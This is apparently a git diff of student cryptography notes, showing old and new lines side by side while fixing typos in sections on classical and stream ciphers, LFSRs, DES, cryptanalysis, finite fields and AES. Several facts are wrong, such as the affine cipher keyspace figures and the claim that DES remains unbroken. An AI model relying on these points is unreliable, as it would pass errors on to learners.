This is a multiplication and a addition analagous to $y=mx+c$ This is a multiplication and an addition analogous to $y=mx+c$
In a Affine cipher, letters can be themselves In an Affine cipher, letters can be themselves
- The keyspace of an affine cipher - The keyspace of an affine cipher
- a can be 0-25 - a can be 0-25
- b can be 0-12 - b can be 0-12
- 25*12=300 - 25*12=300
- More secure than a caesar cipher - More secure than a Caesar cipher
Frequency analysis can still be used, in this case the columns will not only be shifted, but jumbled aswell. Frequency analysis can still be used; in this case the columns will not only be shifted, but jumbled as well.
- This is not hard to crack - This is not hard to crack
#### The Vigenere Cipher #### The Vigenere Cipher
- An early stream cipher, the Vigenere cipher is a shift cipher with a running key - An early stream cipher, the Vigenere cipher is a shift cipher with a running key
- Unlike caesar cipher, the key is repeated for as long as required. - Unlike the Caesar cipher, the key is repeated for as long as required.
- It is the equivalent to multiple interleaved Caesar ciphers - It is the equivalent to multiple interleaved Caesar ciphers
- Spreads outs occurrances of characters making frequency analysis hard. - Spreads out occurrences of characters, making frequency analysis hard.
+16 -18
View File
@@ -20,9 +20,7 @@ d_{s_i} (y_i) \equiv (x_i + 0\cdot s_i \space (mod\space 2) \\
d_{s_i} (y_i) \equiv x_i d_{s_i} (y_i) \equiv x_i
$$ $$
Note: 2 % 2 is 0, its like **xor**-ing twice. Note: 2 % 2 is 0; it's like **xor**-ing twice.
#### Security of XOR #### Security of XOR
@@ -44,12 +42,12 @@ The security of a stream cipher depends entirely on the nature of the key stream
##### True Randomness ##### True Randomness
- True randomness is impossible to recreate except by chance - True randomness is impossible to recreate except by chance
- coin flips - coin flips
- Computer systems often use hardware sources for randomness - Computer systems often use hardware sources for randomness
- Thermal or other noise - Thermal or other noise
- Radioactive decay - Radioactive decay
- Clock drift - Clock drift
- Random timings of interrupts - Random timings of interrupts
##### Pseudo Randomness ##### Pseudo Randomness
@@ -58,7 +56,7 @@ The security of a stream cipher depends entirely on the nature of the key stream
###### Linear Congruential Generator ###### Linear Congruential Generator
Cs `rand()` function, this is a PRNG C's `rand()` function is a PRNG
$$ $$
s_0 = 12345 \\ s_0 = 12345 \\
@@ -76,7 +74,7 @@ $$
#### Unconditional Security #### Unconditional Security
A crypto-system is **unconditional security** is unconditionally or information-theoretically secure if it cannot be broken, even with infinite computational resources. A cryptosystem has **unconditional security**: it is unconditionally or information-theoretically secure if it cannot be broken, even with infinite computational resources.
**Perfect Secrecy**: The cipher-text should reveal no information about the plain text **Perfect Secrecy**: The cipher-text should reveal no information about the plain text
@@ -84,7 +82,7 @@ $\forall_{m_0, m_1} \in M$ where $|m_0| = |m_1|$ and $\forall_c \in C$
$Pr[E(k,m_0) = c] = Pr[E(k,m_1) = c]$ $Pr[E(k,m_0) = c] = Pr[E(k,m_1) = c]$
The probability that $m_0$ encrypts to $c$ is the same as the probability of $m_1$ also encrypted to $c$ The probability that $m_0$ encrypts to $c$ is the same as the probability of $m_1$ also being encrypted to $c$
## One Time Pad ## One Time Pad
@@ -134,7 +132,7 @@ $$
#### Crib Dragging #### Crib Dragging
This involves guessing $M_1$, this can be a common message such as `HTTP` request. This involves guessing $M_1$; this can be a common message such as an `HTTP` request.
This can be automated by checking $M_1$ over different parts of $M_2$. This can be automated by checking $M_1$ over different parts of $M_2$.
@@ -145,14 +143,14 @@ This can be automated by checking $M_1$ over different parts of $M_2$.
- Numbers used once or *nonces* are vital for stream cipher security - Numbers used once or *nonces* are vital for stream cipher security
- Instead of always using a unique key, the security requirement is you always use a unique (key + nonce) pair - Instead of always using a unique key, the security requirement is you always use a unique (key + nonce) pair
- Nonces are not secret, they are public random seed for a key stream - Nonces are not secret; they are public random seeds for a key stream
### Could we use a LCG? ### Could we use an LCG?
- LCG - Linear congruential generators - LCG - Linear congruential generators
- Seed using some key, then - Seed using some key, then
- $s_{i+1} \equiv A \cdot s_i + B \space (mod \space 2)$ - $s_{i+1} \equiv A \cdot s_i + B \space (mod \space 2)$
- $s_i, A, B$ are $log_2m$ bits long - $s_i, A, B$ are $log_2m$ bits long
- This is trivial to break - This is trivial to break
- Given known plaintext $x_1, x_2, x_3$ - Given known plaintext $x_1, x_2, x_3$
- Calculate corresponding key $s_1, s_2, s_3$ - Calculate corresponding key $s_1, s_2, s_3$
+18 -18
View File
@@ -2,23 +2,23 @@
### Pseudo-randomness ### Pseudo-randomness
- TRNGs - true Random Number Generator - TRNGs - True Random Number Generators
- Not feasible at scale - Not feasible at scale
- PRNGs - Pseudo Random Number Generator - PRNGs - Pseudo-random Number Generators
- CSPRNGs - Cryptographically Secure Pseudo Random Number Generator - CSPRNGs - Cryptographically Secure Pseudo-random Number Generators
#### LFSRs #### LFSRs
- A Linear-feedback Shift Register us a register if buts whose positions shift to the right - A linear-feedback shift register is a register of bits whose positions shift to the right
- Usually comprised of flip-flops, the last bit represents the output - Usually comprised of flip-flops, the last bit represents the output
(Where the squares at the bottom are flip-flops) (Where the squares at the bottom are flip-flops)
- If initialised to `000`, nothing happens as $0\oplus0 = 0$. - If initialised to `000`, nothing happens as $0\oplus0 = 0$.
- Therefore, we have $2^n-1$ states - Therefore, we have $2^n-1$ states
- Statistical randomness - Statistical randomness
- To add more randomness to the setup, we can add another (more) `xor` gate - To add more randomness to the setup, we can add another (more) `xor` gate
- However, we have fewer states - However, we have fewer states
$$ $$
s_m \equiv s_{m-1}p_{m-1} + ... + s_1p_1 + s_0p_0\space (mod \space 2)\\ s_m \equiv s_{m-1}p_{m-1} + ... + s_1p_1 + s_0p_0\space (mod \space 2)\\
@@ -27,11 +27,11 @@ $$
- We usually represent m-bit LFSRs using polynomials of degree m. - We usually represent m-bit LFSRs using polynomials of degree m.
- In general $P(x)=x^m + p_{m-1}x^{m-1} + ... + p_1x + p_0$ - In general $P(x)=x^m + p_{m-1}x^{m-1} + ... + p_1x + p_0$
- LFSRs that have primitive polynoimials produce sequences of maximum length - LFSRs that have primitive polynomials produce sequences of maximum length
- There are many and are easily computed - There are many, and they are easily computed
- $x^5 + x^2 + 1$ has 31 states - $x^5 + x^2 + 1$ has 31 states
- $x^{10} + x^3 + 1$ has 1023 - $x^{10} + x^3 + 1$ has 1023
- $x^{85}+x^8+x^2+x+1$ has $10^{26}$ states - $x^{85}+x^8+x^2+x+1$ has $10^{26}$ states
##### Attacking LFSRs ##### Attacking LFSRs
@@ -55,29 +55,29 @@ $s_{2m+1} \equiv s_{2m-1}p_{m} + ... + s_mp_1 + s_{m-1}p_0$
- LFSRs are much more cryptographically secure if we combine more than one together in a non-linear way. - LFSRs are much more cryptographically secure if we combine more than one together in a non-linear way.
Trivium is 3 LFSR in a row Trivium is 3 LFSRs in a row
- Feedback between each with non-linear AND gates - Feedback between each with non-linear AND gates
- Initialises the LFSR with an 80-bit key and 80-bit random value - Initialises the LFSR with an 80-bit key and 80-bit random value
### ChaCha20 ### ChaCha20
- ChaCha is a stream cipher written by Daniel Berstein - ChaCha is a stream cipher written by Daniel Bernstein
- A modification of a previous cipher, Salsa - A modification of a previous cipher, Salsa
- Very lightweight, using only `add`, `xor` and rotate operations - Very lightweight, using only `add`, `xor` and rotate operations
- One of two ciphers in `TLS 1.3` - One of two ciphers in `TLS 1.3`
- Dashes represent bit length - Dashes represent bit length
- Constants are not secret - Constants are not secret
- The block number can skip to anywhere - The block number can skip to anywhere
- Suppose someone skips ahead on a video stream, the cipher can skip unlike other synchronous stream ciphers - Suppose someone skips ahead on a video stream, the cipher can skip unlike other synchronous stream ciphers
- Works well on low power devices, due to simplicity of encryption - Works well on low power devices, due to simplicity of encryption
- Once the input and the mixed words are added together it is hard to know what the starting thing was - Once the input and the mixed words are added together it is hard to know what the starting thing was
- e.g. what two numbers have i added to make 100 - e.g. what two numbers have I added to make 100
ChaCha performs **20** rounds ChaCha performs **20** rounds
- Alternates column and diagonal rounds - Alternates column and diagonal rounds
- Each round is 4 quarter rounds - Each round is 4 quarter rounds
#### Vulnerabilities #### Vulnerabilities
@@ -4,35 +4,35 @@
- A pseudorandom permutation is a function that cannot be distinguished from a random permutation - A pseudorandom permutation is a function that cannot be distinguished from a random permutation
- Maps a set of values $\{0,1\}^n \times \{0,1\}^s \rightarrow \{0,1\}^n$ such that: - Maps a set of values $\{0,1\}^n \times \{0,1\}^s \rightarrow \{0,1\}^n$ such that:
- For any key, the function F is a *bijection* (1:1) - For any key, the function F is a *bijection* (1:1)
- The key just changes the mapping - The key just changes the mapping
- There is an *efficient algorithm* to calculate $F(x)$ for all keys and all messages - There is an *efficient algorithm* to calculate $F(x)$ for all keys and all messages
![1645042514.png](img/1645042514.png) ![1645042514.png](img/1645042514.png)
**Confusion**: Obscure the relationship between plaintext, key and ciphertext **Confusion**: Obscure the relationship between plaintext, key and ciphertext
- Often achieved through substitution operations - Often achieved through substitution operations
- Using lookup tables - Using lookup tables
**Diffusion**: Influence of each plaintext and key bit is distributed throughout the ciphertext **Diffusion**: Influence of each plaintext and key bit is distributed throughout the ciphertext
- Achieved via permutation - Achieved via permutation
- Swapping or otherwise mixing bits/bytes - Swapping or otherwise mixing bits/bytes
Shannon called a cipher like this a **product cipher** Shannon called a cipher like this a **product cipher**
### Feistal Network ### Feistel Network
- A Feistal Network is one mechanism used to create block ciphers - A Feistel network is one mechanism used to create block ciphers
- Developed by Horst Feistal while he worked at IBM - Developed by Horst Feistel while he worked at IBM
- Underpins DES, GOST, Blowfish, Twofish and numerous others. - Underpins DES, GOST, Blowfish, Twofish and numerous others.
![1645042957.png](img/1645042957.png) ![1645042957.png](img/1645042957.png)
- To decrypt, we run the encrypted bits through the network again - To decrypt, we run the encrypted bits through the network again
##### A Single Feistal Round ##### A Single Feistel Round
- During each round, only half of the block is encrypted - During each round, only half of the block is encrypted
@@ -58,17 +58,17 @@ Note - the last round does a final swap so the left and right are in the correct
Basically the `xor`s cancel themselves out, the most important part is choosing a good function $f$ Basically the `xor`s cancel themselves out, the most important part is choosing a good function $f$
#### About Feistal Networks #### About Feistel Networks
- 1 or 2 rounds is not sufficient - 1 or 2 rounds are not sufficient
- Luby and Rackoff show that if $f$ is a cryptographically secure pseudorandom function then: - Luby and Rackoff show that if $f$ is a cryptographically secure pseudorandom function then:
- 3 rounds are sufficient to make a pseudorandom permutation - 3 rounds are sufficient to make a pseudorandom permutation
- 4 rounds are sufficient to make a strong pseudorandom permutation - 4 rounds are sufficient to make a strong pseudorandom permutation
- Balanced Feistal networks - Balanced Feistel networks
- L and R are equal sizes - L and R are equal sizes
- Unbalanced feistal networks - Unbalanced Feistel networks
- L and R can be different sizes - L and R can be different sizes
- e.g. `skipjack`, `OAEP` - e.g. `skipjack`, `OAEP`
### DES ### DES
@@ -78,10 +78,10 @@ Basically the `xor`s cancel themselves out, the most important part is choosing
1976: NIST accepts an altered version of DES following consultation with NSA 1976: NIST accepts an altered version of DES following consultation with NSA
- Feistal network with 64-bit block size - Feistel network with 64-bit block size
- 56-bit key - 56-bit key
- The most studied cipher in history - The most studied cipher in history
- Hasn’t been broken for over 46 years - Hasn’t been broken for over 46 years
![1645044034.png](img/1645044034.png) ![1645044034.png](img/1645044034.png)
@@ -93,7 +93,7 @@ This speeds up loading bits into registers
![1645044186.png](img/1645044186.png) ![1645044186.png](img/1645044186.png)
$S_1, S_2....$ are called s-boxes. These substitute 6 bits input to 4 bits output based on lookup tables. The lookup tables for each s-box is different. $S_1, S_2....$ are called s-boxes. These substitute 6-bit inputs with 4-bit outputs based on lookup tables. The lookup tables for each s-box are different.
##### Expansion ##### Expansion
@@ -107,7 +107,7 @@ $S_1, S_2....$ are called s-boxes. These substitute 6 bits input to 4 bits outpu
##### Substitution Boxes ##### Substitution Boxes
- Add confusion - Add confusion
- The s-boxes map 6 bit inputs to 4-bit outputs - The s-boxes map 6-bit inputs to 4-bit outputs
- There are 8 s-boxes in total, each is different - There are 8 s-boxes in total, each is different
![1645044443.png](img/1645044443.png) ![1645044443.png](img/1645044443.png)
@@ -115,19 +115,19 @@ $S_1, S_2....$ are called s-boxes. These substitute 6 bits input to 4 bits outpu
- This s-box is not random, very carefully designed - This s-box is not random, very carefully designed
- s-boxes need to be highly **non-linear**: $S(a) \oplus S(b) \neq S(a\oplus b)$ - s-boxes need to be highly **non-linear**: $S(a) \oplus S(b) \neq S(a\oplus b)$
- This prevents simple systems of linear equations such as we saw in LFSRs. - This prevents simple systems of linear equations such as we saw in LFSRs.
- The formula needed to represent DES is too complicated - The formula needed to represent DES is too complicated
- Key design principles - Key design principles
1. No output bit should be too close to a linear combination of input bits 1. No output bit should be too close to a linear combination of input bits
2. 1-bit change input should lead to at least 2-bits output 2. 1-bit change input should lead to at least 2-bits output
3. If you only change the 4 middle bits, each output must occur exactly once 3. If you only change the 4 middle bits, each output must occur exactly once
4. If the first two bits are different but the last two are identical, the output must differ 4. If the first two bits are different but the last two are identical, the output must differ
5. For any non-zero difference in input, no more than 8 of the 32 inputs exhibiting this difference should share the same output difference 5. For any non-zero difference in input, no more than 8 of the 32 inputs exhibiting this difference should share the same output difference
- We want to limit the number of predictable swaps - We want to limit the number of predictable swaps
6. A collision (zero difference) is only possible for 3 adjacent s-boxes 6. A collision (zero difference) is only possible for 3 adjacent s-boxes
##### Permutation ##### Permutation
- At the end of $f()$ is a permuatation - At the end of $f()$ is a permutation
- This moves bits between s-boxes on the next round - This moves bits between s-boxes on the next round
![1645044919.png](img/1645044919.png) ![1645044919.png](img/1645044919.png)
@@ -138,10 +138,10 @@ $S_1, S_2....$ are called s-boxes. These substitute 6 bits input to 4 bits outpu
If you input all 0s, we will see a random cipher text If you input all 0s, we will see a random cipher text
However if we change one 0 to a 1, how does this effect the result. However, if we change one 0 to a 1, how does this affect the result?
- On average, if you change one (first) bit in $R$, one bit will change in the expansion - On average, if you change one (first) bit in $R$, one bit will change in the expansion
- Due to the way the s-boxes are setup, at least 2 of the 4 bits in the output will be different - Due to the way the s-boxes are set up, at least 2 of the 4 bits in the output will be different
- Now when the permutation happens, these two changes are spread to other s-boxes - Now when the permutation happens, these two changes are spread to other s-boxes
- Now next round we’ll get 4 changes, then 8, then 16 … - Now next round we’ll get 4 changes, then 8, then 16 …
+32 -32
View File
@@ -3,11 +3,11 @@
#### Key Schedule #### Key Schedule
- The **DES** key schedule simply returns various permutations of $k$ as sub-keys - The **DES** key schedule simply returns various permutations of $k$ as sub-keys
- $k_1, ... k_{16}$ - $k_1, ... k_{16}$
##### PC-1 ##### PC-1
- Permutated Choice 1 (PC-1) selects 56 of the 64 bits - Permuted Choice 1 (PC-1) selects 56 of the 64 bits
- The other ‘parity’ bits are discarded: DES only uses a 56-bit key - The other ‘parity’ bits are discarded: DES only uses a 56-bit key
- Key bits are spread throughout the initial state of the key schedule - Key bits are spread throughout the initial state of the key schedule
- Key bits 8, 16, 24,…64 are not used - Key bits 8, 16, 24,…64 are not used
@@ -16,14 +16,14 @@
#### Left Rotation #### Left Rotation
- Left rotations (often written as `<<<`) represent a lift shift where the left most numbers wrap around to the right hand side - Left rotations (often written as `<<<`) represent a left shift where the leftmost numbers wrap around to the right-hand side
- In DES, each 28-bit block is rotated left by `<<<1` for rounds 1,2,9,16 and `<<<2` otherwise - In DES, each 28-bit block is rotated left by `<<<1` for rounds 1,2,9,16 and `<<<2` otherwise
- The total rotation is $4\cdot 1 + 12\cdot 2 = 28$ which means $C_0 = C_{16}$ and $D_0 = D_{16}$ - The total rotation is $4\cdot 1 + 12\cdot 2 = 28$ which means $C_0 = C_{16}$ and $D_0 = D_{16}$
- NOTE: $C_0$ or $D_0$ is not used - NOTE: $C_0$ or $D_0$ is not used
##### PC-2 ##### PC-2
- Permuted Choice 2 select 48 of the 56 bits to be used as a round key - Permuted Choice 2 selects 48 of the 56 bits to be used as a round key
![1645476385.png](img/1645476385.png) ![1645476385.png](img/1645476385.png)
@@ -31,8 +31,8 @@
- Is entirely permutation based - Is entirely permutation based
- Doesn’t use `xor`, addition or any other mixing operation - Doesn’t use `xor`, addition or any other mixing operation
- Because $C_0 = C_{16}$ and $D_0 = D_{16}$ we don’t need to write seperate encrpt and decrypt functions - Because $C_0 = C_{16}$ and $D_0 = D_{16}$ we don’t need to write separate encrypt and decrypt functions
- Usful for writing implementations on low memory devices (smart cards) - Useful for writing implementations on low-memory devices (smart cards)
### Breaking DES ### Breaking DES
@@ -47,10 +47,10 @@ NOTE: $2^{56}-1$ is a very large number
#### Key Collisions #### Key Collisions
- For a 56-bit key but a 64-bit block is possible (though unlikely) a different key would work - For a 56-bit key but a 64-bit block, it is possible (though unlikely) that a different key would work
- How likely is this to happen for a 1 bit key and an $n$ bit block cipher - How likely is this to happen for a 1 bit key and an $n$ bit block cipher
- $\frac{2^l}{2^n}$ where $l$ is the length of the block and $n$ is the key length - $\frac{2^l}{2^n}$ where $l$ is the length of the block and $n$ is the key length
- $\frac{2^{64}}{2^{56}} = 2^8$ - $\frac{2^{64}}{2^{56}} = 2^8$
![1645477137.png](img/1645477137.png) ![1645477137.png](img/1645477137.png)
@@ -64,15 +64,15 @@ NOTE: $2^{56}-1$ is a very large number
![1645477338.png](img/1645477338.png) ![1645477338.png](img/1645477338.png)
- Naive brute fource suggests $2^{56}\cdot 2^{56} = 2^{112}$ keyspace - Naive brute force suggests $2^{56}\cdot 2^{56} = 2^{112}$ keyspace
- However using a meet-in-the middle attack this becomes trival. - However, using a meet-in-the-middle attack, this becomes trivial.
- Step 1: Calculate encryptions of $x_1$ for all $k_{1...,i}$ and store intermediate values $Z_{1..,i}$ - Step 1: Calculate encryptions of $x_1$ for all $k_{1...,i}$ and store intermediate values $Z_{1..,i}$
- Step 2: Calculate all decryptions of $y_1$ for all $k_{R, j}$ to find $Z_{R,i}$ - Step 2: Calculate all decryptions of $y_1$ for all $k_{R, j}$ to find $Z_{R,i}$
- Step 3: Find any value of $Z_{R,j}$ matching existing $Z_L,i$ - Step 3: Find any value of $Z_{R,j}$ matching existing $Z_L,i$
![1645477760.png](img/1645477760.png) ![1645477760.png](img/1645477760.png)
Meet-in-the-middle requires $2^{k+1}$ attemps rather than $2^{k\cdot 2}$ Meet-in-the-middle requires $2^{k+1}$ attempts rather than $2^{k\cdot 2}$
- This is much better than brute force, but doesn’t make it easy - This is much better than brute force, but doesn’t make it easy
- Trades off computation for storage - Petabytes for DES - Trades off computation for storage - Petabytes for DES
@@ -81,7 +81,7 @@ Meet-in-the-middle requires $2^{k+1}$ attemps rather than $2^{k\cdot 2}$
## 3DES ## 3DES
- Triple DES uses three different keys - Triple DES uses three different keys
- Either `enc -> enc -> enc` or `enc -> dec -> enc` - Either `enc -> enc -> enc` or `enc -> dec -> enc`
- Often used in banking, smart cards and other payment systems - Often used in banking, smart cards and other payment systems
![1645478048.png](img/1645478048.png) ![1645478048.png](img/1645478048.png)
@@ -100,34 +100,34 @@ This is why banking systems use 3DES as they already have the infrastructure for
![1645478296.png](img/1645478296.png) ![1645478296.png](img/1645478296.png)
- Theoretically this provides a seach space of $2^{k+2n}$ but meet-in-the-middle can be used here, as well as other more advanced attacks - Theoretically this provides a search space of $2^{k+2n}$ but meet-in-the-middle can be used here, as well as other more advanced attacks
- In practive securtity is $2^{k+n-m}$ where an attack has $2^m$ known plain texts - In practice, security is $2^{k+n-m}$ where an attack has $2^m$ known plain texts
# Cryptanalysis # Cryptanalysis
#### What is a break? #### What is a break?
- In modern cryptography, a cipher is declared broken by essentially any attack that is more efficient than brute force - In modern cryptography, a cipher is declared broken by essentially any attack that is more efficient than brute force
- For example, *differential cryptanalysis* requires $2^{47}$ operations on DES rather than $2^{56}$ - For example, *differential cryptanalysis* requires $2^{47}$ operations on DES rather than $2^{56}$
- These are often academic breaks, rather than a practical security concern - These are often academic breaks, rather than a practical security concern
- For example there is a *related key* attack on AES of $2^{99.5}$, compared to brute force of $2^{128}$ - For example there is a *related key* attack on AES of $2^{99.5}$, compared to brute force of $2^{128}$
- Remember that a $2^{n-1}$ takes half the time $2^n$ does - Remember that a $2^{n-1}$ takes half the time $2^n$ does
##### Analytical Attacks ##### Analytical Attacks
- Exploit some underlying structureal or mathematical weakness in a cipher - Exploit some underlying structural or mathematical weakness in a cipher
- e.g. meet in the middle attack - e.g. meet in the middle attack
- Derivation of taps in LFSRs - Derivation of taps in LFSRs
##### Statistical Attacks ##### Statistical Attacks
- Capture statistical patterns between input and output to recover key bits - Capture statistical patterns between input and output to recover key bits
- Differential cryptanalysis - Differential cryptanalysis
- Linear cryptanalysis - Linear cryptanalysis
###### Differential Cryptanalysis ###### Differential Cryptanalysis
- Different cryptanalysis is prehaps now the most important modern method for breaking block ciphers - Differential cryptanalysis is perhaps now the most important modern method for breaking block ciphers
- It is a **chosen plaintext** attack - It is a **chosen plaintext** attack
- We aim to find predictable changes in output bits caused by known changes in the input bits - We aim to find predictable changes in output bits caused by known changes in the input bits
@@ -141,15 +141,15 @@ This is why banking systems use 3DES as they already have the infrastructure for
![1645479256.png](img/1645479256.png) ![1645479256.png](img/1645479256.png)
- Tracing differentials through a cipher provides us with **differential characteristics** e.g. - Tracing differentials through a cipher provides us with **differential characteristics** e.g.
- $(\Delta x, \Delta y) =$ (0x80, 0xA0) where $p \geq 2^{-3} = 1/8$ - $(\Delta x, \Delta y) =$ (0x80, 0xA0) where $p \geq 2^{-3} = 1/8$
- These can be calculated by hand or using automated tools - These can be calculated by hand or using automated tools
- The attack then looks for these expected differentials as you manipulate sub-key bits - The attack then looks for these expected differentials as you manipulate sub-key bits
###### Resisting differential cryptanalysis ###### Resisting differential cryptanalysis
- S-boxes must be designed such that the probability of any pair $(\Delta x, \Delta y)$ is as low as possible - S-boxes must be designed such that the probability of any pair $(\Delta x, \Delta y)$ is as low as possible
- AES has a maximum likelihood of a differential per s-box of $2^{-6}$ - AES has a maximum likelihood of a differential per s-box of $2^{-6}$
- This is because AES has such good diffusion - This is because AES has such good diffusion
- More rounds make differentials even less likely - More rounds make differentials even less likely
- Good permuation to involve more s-boxes is vital - Good permutation to involve more s-boxes is vital
- DES was specifically designed to resist this kind of attack - DES was specifically designed to resist this kind of attack
+17 -17
View File
@@ -1,12 +1,12 @@
# Finite Field Arithmetic # Finite Field Arithmetic
- A **finite field** is a set containing a finite number of elements - A **finite field** is a set containing a finite number of elements
- This is sometimes called a *Galois Field* - This is sometimes called a *Galois Field*
- In a Galois field you can: - In a Galois field you can:
- Add - Add
- Subtract - Subtract
- Multiply - Multiply
- Invert (divide) - Invert (divide)
- Fields are an extension of *groups* and related to *rings* - Fields are an extension of *groups* and related to *rings*
### Groups ### Groups
@@ -14,9 +14,9 @@
A group is a set of elements $G$ together with an operation $\circ$ that combines two elements of $G$ A group is a set of elements $G$ together with an operation $\circ$ that combines two elements of $G$
> 1. The operation $\circ$ is **closed** > 1. The operation $\circ$ is **closed**
> - i.e. for all $a,b \in G$ then $a\circ b=c\in G$ > - i.e. for all $a,b \in G$ then $a\circ b=c\in G$
> 2. The operation is associative > 2. The operation is associative
> - i.e. $a\circ(b\circ c) = (a\circ b)\circ c$ for all $a,b,c \in G$ > - i.e. $a\circ(b\circ c) = (a\circ b)\circ c$ for all $a,b,c \in G$
> 3. There is an element $1\in G$ called a **neutral element** such that $a\circ 1 = 1\circ a = a$ for all $a\in G$ > 3. There is an element $1\in G$ called a **neutral element** such that $a\circ 1 = 1\circ a = a$ for all $a\in G$
> 4. For each $a \in G$ there exists an element $a^{-1}\in G$ called the **inverse** of $a$ such that $a\circ a^{-1} = a^{-1}\circ a = 1$ > 4. For each $a \in G$ there exists an element $a^{-1}\in G$ called the **inverse** of $a$ such that $a\circ a^{-1} = a^{-1}\circ a = 1$
> 5. A group $G$ is **abelian** (commutative) if $a\circ b = b \circ a$ for all $a,b\in G$ > 5. A group $G$ is **abelian** (commutative) if $a\circ b = b \circ a$ for all $a,b\in G$
@@ -26,7 +26,7 @@ A group is a set of elements $G$ together with an operation $\circ$ that combine
- The set of integers $\mathbb{Z}_m = \{0,1,...m-1\}$ with the operation addition modulo m form a group with the neutral element 0 - The set of integers $\mathbb{Z}_m = \{0,1,...m-1\}$ with the operation addition modulo m form a group with the neutral element 0
- Every element would have an inverse where $a + (-a) = 0$ mod m - Every element would have an inverse where $a + (-a) = 0$ mod m
- This group would not form a group with multiplication, as not all elements would have an inverse - This group would not form a group with multiplication, as not all elements would have an inverse
- We wouldn’t have an inverse, we would need $5\times \frac15=1$ however $\frac15 \notin \mathbb{Z}$ - We wouldn’t have an inverse; we would need $5\times \frac15=1$, but $\frac15 \notin \mathbb{Z}$
### Fields ### Fields
@@ -35,12 +35,12 @@ A field $F$ is a set of elements with the following properties
> 1. All elements of $F$ form an **additive group** with the group operation $+$ and the neutral element 0 > 1. All elements of $F$ form an **additive group** with the group operation $+$ and the neutral element 0
> 2. All elements of $F$ except 0 form a multiplicative group with the group operation $\times$ and the neutral element 1 > 2. All elements of $F$ except 0 form a multiplicative group with the group operation $\times$ and the neutral element 1
> 3. When the two group operations are mixed, the distributivity law holds. > 3. When the two group operations are mixed, the distributivity law holds.
> - i.e. for all $a,b,c \in F, a\cdot(b+c) = (a\cdot b) + (a\cdot c)$ > - i.e. for all $a,b,c \in F, a\cdot(b+c) = (a\cdot b) + (a\cdot c)$
##### Example Field ##### Example Field
- The set of real numbers $\mathbb{R}$ is a field with neutral element 0 for addition and 1 for multiplication - The set of real numbers $\mathbb{R}$ is a field with neutral element 0 for addition and 1 for multiplication
- Every real number $a$ has a additive inverse $-a$ - Every real number $a$ has an additive inverse $-a$
- Every non-zero number $a$ has a multiplicative inverse $\frac{1}{a}$ - Every non-zero number $a$ has a multiplicative inverse $\frac{1}{a}$
![1646405235.png](img/1646405235.png) ![1646405235.png](img/1646405235.png)
@@ -80,7 +80,7 @@ $a \cdot a^{-1} \equiv 1 \space (mod \space p)$
- A modular inverse exists when $gcd(a,p) = 1$ - A modular inverse exists when $gcd(a,p) = 1$
- Because $p$ is prime, every number has a multiplicative inverse - Because $p$ is prime, every number has a multiplicative inverse
- $gcd(a,p) = 1, \forall a \neq0 \in GF(p)$ - $gcd(a,p) = 1, \forall a \neq0 \in GF(p)$
- $a^{-1}$ can be calculated using the **extended Euclidean algorithm** - $a^{-1}$ can be calculated using the **extended Euclidean algorithm**
#### Extension Fields #### Extension Fields
@@ -97,16 +97,16 @@ The coefficients of the polynomial are elements in $GF(2)$ the **sub-field**
##### Example $GF(2^3)$ ##### Example $GF(2^3)$
- The field $GF(2^3)$, sometimes called $GF(8)$ is an extension field containing elements of the form: $A(x) = a_2 x^2 + a_1x^1 + a_0$ - The field $GF(2^3)$, sometimes called $GF(8)$ is an extension field containing elements of the form: $A(x) = a_2 x^2 + a_1x^1 + a_0$
- Its often easier to simply write the coefficients $(a_2, a_1, a_0)$ e.g. 001 or 101 - It's often easier to simply write the coefficients $(a_2, a_1, a_0)$ e.g. 001 or 101
- $GF(2^3) = \{0, 1, x, x+1, x^2, x^2+1, x^2 + x, x^2 + x + 1\}$ - $GF(2^3) = \{0, 1, x, x+1, x^2, x^2+1, x^2 + x, x^2 + x + 1\}$
- $|GF(2^3)| = 8$ - $|GF(2^3)| = 8$
#### Arithmetic in $GF(2^3)$ #### Arithmetic in $GF(2^3)$
- Adding or subtracting two polynomials happens as expected, but adding the coefficients - Adding or subtracting two polynomials happens as expected, but adding the coefficients
- $A(x) = x^2 + x + 1$ - $A(x) = x^2 + x + 1$
- $B(x) = x^2 + 1$ - $B(x) = x^2 + 1$
- $A(x) + B(x) = (1+1)x^2 + (1)x + (1+1) = x$ - $A(x) + B(x) = (1+1)x^2 + (1)x + (1+1) = x$
- mod 2 is simply `xor` - mod 2 is simply `xor`
- Addition and subtraction are identical - Addition and subtraction are identical
@@ -130,7 +130,7 @@ $$
- Inversion is performed in a similar way to prime fields, we find: - Inversion is performed in a similar way to prime fields, we find:
- $A(x) \cdot A^{-1}(x) \equiv 1 \space (mod \space P(x))$ - $A(x) \cdot A^{-1}(x) \equiv 1 \space (mod \space P(x))$
- $A^{-1}(x)$ is calculated using the extended euclidean algorithm - $A^{-1}(x)$ is calculated using the extended Euclidean algorithm
### AES’ Finite Field ### AES’ Finite Field
+44 -38
View File
@@ -2,7 +2,7 @@
- AES superseded DES as a standard in 2002 - AES superseded DES as a standard in 2002
![1646490755.png](img/1646490755.png) ![1646490755.png](img/1646490755.png)
- Uses rounds of 4 layers and a final round of 3 - Uses rounds of 4 layers and a final round of 3
- Bytes are represented as a 4x4 block called the *state* - Bytes are represented as a 4x4 block called the *state*
@@ -19,12 +19,12 @@ First row doesn’t move, second row is shifted to the left by 1, the third row
Then, when the columns are mixed, this means the overall diffusion is extremely good Then, when the columns are mixed, this means the overall diffusion is extremely good
The last round doesn’t have a **mix column** step as its reversible and wouldn’t add additional security. The last round doesn’t have a **mix column** step as it's reversible and wouldn’t add additional security.
#### S-Box #### S-Box
- The AES s-box is based around the multiplicative inverse of 8-bit values in $GF(2^8)$ - The AES s-box is based around the multiplicative inverse of 8-bit values in $GF(2^8)$
- This is strongly *non-linear* mapping - This is a strongly *non-linear* mapping
$$ $$
A_i \cdot A_i^{-1} \equiv 1 \space (mod \space P(x)) \\ A_i \cdot A_i^{-1} \equiv 1 \space (mod \space P(x)) \\
@@ -37,7 +37,7 @@ $$
![1646491900.png](img/1646491900.png) ![1646491900.png](img/1646491900.png)
- Note: 0 maps to 0 - Note: 0 maps to 0
- The inverses $B'_i$ then undergo an **affine transformation** to produce the final s-box - The inverses $B'_i$ then undergo an **affine transformation** to produce the final s-box
- This destroys any remaining mathematical structure - This destroys any remaining mathematical structure
![1646491995.png](img/1646491995.png) ![1646491995.png](img/1646491995.png)
@@ -46,15 +46,15 @@ Remember an affine transformation is a multiplication and addition by two consta
##### S-box Properties ##### S-box Properties
- The s-box simply described, and is bijective, an invertible 1:1 mapping - The s-box is simply described, and is bijective, an invertible 1:1 mapping
- It has no fixed points - It has no fixed points
